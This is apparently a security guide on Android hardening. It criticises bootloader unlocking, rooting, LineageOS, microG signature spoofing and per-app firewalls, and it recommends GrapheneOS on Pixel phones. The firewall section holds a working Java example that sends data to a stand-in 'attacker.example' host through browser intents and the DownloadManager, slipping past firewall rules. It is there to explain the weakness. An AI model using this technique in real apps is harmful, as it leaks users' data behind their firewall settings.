Android

Android by default has a strong security model: full system SELinux policies, strong app sandboxing, full verified boot, modern exploit mitigations like fine-grained forward-edge Control-Flow Integrity and ShadowCallStack, widespread use of memory-safe languages (Java) and more. This article covers common ways people ruin that security model rather than criticisms of the security model itself.

Unlocking the bootloader

Unlocking the bootloader in Android is a massive security risk. It disables verified boot, a fundamental part of the security model. Verified boot ensures the integrity of the base system and boot chain to prevent malware persistence: even if an attacker has compromised the entire running system and gained extremely high privileges, any modification they make to the boot chain or the system partitions is detected at the next boot, so the compromise cannot persist across a reboot.

Verified boot is not just for physical security as many people assume. Its main purpose is protection against remote attackers and the physical security is a nice side-effect.

Unlocking the bootloader is strongly discouraged.

Rooting your device

Rooting your device allows an attacker to easily gain extremely high privileges. Android's architecture is built upon the principle of least privilege. By default, unrestricted root is found nowhere in the system thanks to the full system SELinux policy; even the init system is not unrestricted root. Exposing privileges far greater than any other part of the OS has to the application layer throws that design away.

It does not matter if you have to whitelist the apps that get root. An attacker can fake user input, for example via clickjacking, or exploit vulnerabilities in an app you have already granted root to.

People often argue that if root were insecure, Linux would not allow it. Linux does not have a security model like Android does; on the usual Linux system, gaining root is extremely easy.

Custom ROMs

The majority of custom ROMs ruin the security model by disabling verified boot, using userdebug builds, disabling SELinux, not including firmware updates, and more. A common ROM that does many of these is LineageOS.

LineageOS

LineageOS uses userdebug builds, which add tons of debugging tools as extra attack surface, weaken SELinux policies and expose root access via adb (you can check this yourself: `adb shell getprop ro.build.type` reports `userdebug` rather than `user`). LineageOS requires an unlocked bootloader and disables verified boot, which is essential to verify the integrity of the OS. It does not implement rollback protection, so an attacker can downgrade the OS to an old version and exploit already patched vulnerabilities (you can tell because the updater allows you to downgrade versions). It does not include firmware updates, which prevents you from getting new patches that fix vulnerabilities. And there are plenty more issues.

LineageOS (and most other custom ROMs) is focused on customizing the device, not on privacy or security.

MicroG / Signature Spoofing

MicroG is a common alternative to Google Play Services. Many people use it to get rid of Google tracking on their device, but do not realise that it substantially worsens security: it requires signature spoofing, which allows apps to request that the OS bypass signature verification for them.

Although, some signature spoofing implementations restrict it to make it less bad such as the one used by CalyxOS.

Firewalls

Firewalls such as AFWall+ or NetGuard are regularly used on Android to try to block network access for a specific app, but they do not work reliably. Apps can use IPC to bypass the restrictions: cutting off an app's own network access does not prevent it from sending an intent to another app (such as the browser) and having that app make the same connection on its behalf.

Many apps already do this unintentionally, for example by handing downloads to the system download manager, which fetches them from its own process.
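As an added illustration (not code from the original page or from any firewall app), the following Android Java class shows both IPC paths described above. The app itself holds no INTERNET permission, or has its traffic blocked by a per-app firewall, yet the data in `data` still leaves the device because another process makes the request. The host name `attacker.example` and the query parameter name are assumptions for illustration only.

```java
import android.app.DownloadManager;
import android.content.ActivityNotFoundException;
import android.content.Context;
import android.content.Intent;
import android.net.Uri;

// Added example, not from the original page: an app whose own network access
// is blocked can still trigger a network request by handing a URL to another
// app over IPC. Per-app firewall rules keyed on this app's UID never see the
// resulting packets, because a different UID sends them.
public final class IpcNetworkBypass {
    // Assumed attacker-controlled endpoint (illustration only).
    private static final String EXFIL_ENDPOINT = "https://attacker.example/collect";

    private IpcNetworkBypass() {}

    // Builds a URL that carries the data to exfiltrate in the query string.
    static Uri buildExfilUri(String data) {
        return Uri.parse(EXFIL_ENDPOINT).buildUpon()
                .appendQueryParameter("d", data)
                .build();
    }

    // Path 1: ask whatever app handles VIEW for https URLs (normally the
    // browser) to open the URL. The browser's process makes the connection.
    // Must be called from a foreground app; newer Android versions restrict
    // background activity launches.
    static boolean viaBrowser(Context ctx, String data) {
        Intent intent = new Intent(Intent.ACTION_VIEW, buildExfilUri(data));
        intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        try {
            ctx.startActivity(intent);
            return true;
        } catch (ActivityNotFoundException e) {
            // No app handles https URLs in this profile, so this path is closed.
            return false;
        }
    }

    // Path 2: the system DownloadManager. It runs in its own UID and fetches
    // the URL on the app's behalf, which is exactly how apps end up doing this
    // unintentionally. Returns the download id assigned by the manager.
    static long viaDownloadManager(Context ctx, String data) {
        DownloadManager dm = (DownloadManager) ctx.getSystemService(Context.DOWNLOAD_SERVICE);
        DownloadManager.Request req = new DownloadManager.Request(buildExfilUri(data))
                .setTitle("update");
        return dm.enqueue(req);
    }
}
```

Neither path is a bug in the firewall app: the firewall sees only traffic from the restricted app's UID, and both requests above are sent by a different UID. This is why the page's recommendation is to isolate the app in its own profile, where no browser or download manager is reachable from it, rather than to filter its packets.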

The most effective way to block network access is to run the app in its own profile, so it cannot communicate with apps outside that profile, and to revoke the INTERNET permission from the app, as GrapheneOS allows you to do.

Conclusion

The best option for privacy/security on Android is to get a Pixel 3 or newer and flash GrapheneOS. GrapheneOS does not contain any tracking, unlike the stock OS on most devices, and includes many hardening enhancements such as a hardened memory allocator, hardened C library, hardened kernel, stricter SELinux policies and more.

Pixels are also the best hardware to use as they have lots of hardening other devices lack such as full verified boot with support for custom keys, Titan M, hardened basebands, a good IOMMU to isolate hardware devices, fine-grained forward-edge kernel Control-Flow Integrity, kernel ShadowCallStack, etc.

Remember that GrapheneOS cannot prevent you from ruining your privacy yourself. You still have to be careful regardless of the operating system.
